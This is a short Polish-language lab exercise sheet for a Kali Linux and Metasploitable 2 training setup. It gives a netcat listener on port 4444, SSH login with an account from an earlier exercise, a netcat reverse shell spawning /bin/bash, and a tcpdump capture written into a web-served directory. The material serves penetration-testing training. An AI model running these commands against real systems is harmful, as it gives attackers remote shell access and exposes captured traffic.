Środowisko:

- Kali Linux
- Metasploitable 2 VM

1. [Kali Linux] uruchom nasłuchiwanie na porcie tcp/4444 => nc -lvnp 4444
2. [Kali Linux] Zaloguj się wykorzystujac login i haslo z cwiczenia 9 => ssh -o HostKeyAlgorithms=+ssh-dss firefart@[IP metasploitable]
3. [Metasploitable 2 VM] Uruchom reverse shell z powłoką bash => nc [IP Kali Linux] 4444 -e /bin/bash &
4. [Metasploitable 2 VM] tcpdump -i eth0 port 80 > /var/www/dav/test.pcap